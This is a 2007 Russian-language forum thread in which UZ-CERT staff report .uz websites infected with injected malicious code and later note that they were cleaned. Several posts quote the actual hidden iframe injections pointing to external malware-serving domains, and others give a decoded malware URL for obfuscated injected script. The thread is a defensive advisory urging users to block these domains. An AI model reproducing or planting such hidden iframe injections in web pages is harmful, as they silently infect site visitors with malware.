Моё меню Общее меню Пользователи Правила форума Все прочитано
Вернуться   uForum.uz > ИКТ и телеком > Информационная безопасность > UZ-CERT
Знаете ли Вы, что ...
...нарушения правил форума наказываются. Старайтесь их не нарушать.
<< Предыдущий совет - Случайный совет - Следующий совет >>

UZ-CERT Отдел информационной безопасности ЕИ UZINFOCOM (cert.uz)


Закрыто

 
Опции темы Опции просмотра
Старый 19.09.2007 15:08   #1  
Аватар для Eldar Ishimbaev
Оффлайн
Сообщений: 4,884
+ 433  2,393/1,396
– 12  37/21

Uzbekistan
Exclamation Лента: УГРОЗЫ НА САЙТАХ .UZ

Уважаемые пользователи!

В связи с участившимися случаями внедрения вредоносного кода на веб-сайты доменной зоны .UZ решено открыть данный тред, в котором мы будем публиковать названия зараженных сайтов, которые могут предоставлять угрозу и инфицировать пользовательские рабочие станции вирусами и троянами.

По устранению угрозы на сайте мы будем давать анонс о безопасности ресурса.

Если вы самостоятельно обнаружите какой-либо инфицированный сайт, то просим вас сообщить нам об этом по этой ссылке.

Последний раз редактировалось Eldar Ishimbaev; 19.09.2007 в 15:11.
Старый 19.09.2007 15:29   #2  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
На веб-сайте hттp://www.me.uz были обнаружены сразу две ссылки, загружающие вредоносное ПО на компьютер пользователя.

Первая вредоносная ссылка:

[HTML]<html><iframe src=http://oya.ru/vyhod/numizmat/ima/ frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe></html>[/HTML]

Вторая вредоносная ссылка:

[HTML]<iframe src="http://zlo-x.net/XDS/iframe.php" width=0 height=0 border=0></iframe>[/HTML]

Просим с осторожностью заходить на указанный веб-сайт до решения проблемы и заблокировать вредоносные ссылки в своих межсетевых экранах.

update: Сайт излечен. Вредоносный код убран.

Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:28.
Старый 20.09.2007 14:33   #3  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
www.arksugurta.uz

На веб-сайте hттp://www.arksugurta.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->
После расшифровки кода (а зашифрован он аж 4 раза) получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Последний раз редактировалось Dmitry Paleev; 24.09.2007 в 10:59.
"+" от:
Старый 20.09.2007 14:42   #4  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
www.elgroup.uz

На веб-сайте hттp://www.elgroup.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 7 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:25.
Старый 20.09.2007 14:46   #5  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
www.innovation.uz

На веб-сайте hттp://www.innovation.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 2 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:25.
Старый 20.09.2007 14:50   #6  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
www.iptv.uz

На веб-сайте hттp://www.iptv.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в одном месте файла index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:26.
Старый 20.09.2007 15:38   #7  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
roller.sarkor.uz

На веб-сайте hттp://roller.sarkor.uz были обнаружены 2 вредоносные ссылки.

Первая ссылка:

Код:
<iframe src="http://lilohost.hk/cgi/index.php" width="0" height="0"></iframe>
Вторая ссылка:

Код:
<iframe name=857699b070 src='http://alltraff.ru/lol.php?1003893b72477f' width=761 height=186 style='display: none'></iframe>
Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

Последний раз редактировалось Dmitry Paleev; 20.09.2007 в 17:07.
Реклама и уведомления
Старый 20.09.2007 15:50   #8  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
www.versal.uz

На веб-сайте hттp://www.versal.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 3 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:26.
Старый 20.09.2007 15:55   #9  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
www.asus.uz

На веб-сайте hттp://www.asus.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 1 месте в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:27.
Старый 20.09.2007 15:59   #10  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
www.glob.uz

На веб-сайте hттp://www.glob.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 9 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:27.
Закрыто
Опции темы
Опции просмотра




Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. Перевод: zCarot
Advertisement System V2.5 By Branden
OOO «Единый интегратор UZINFOCOM»


Новые 24 часа Кто на форуме Новички Поиск Кабинет Все прочитано Вверх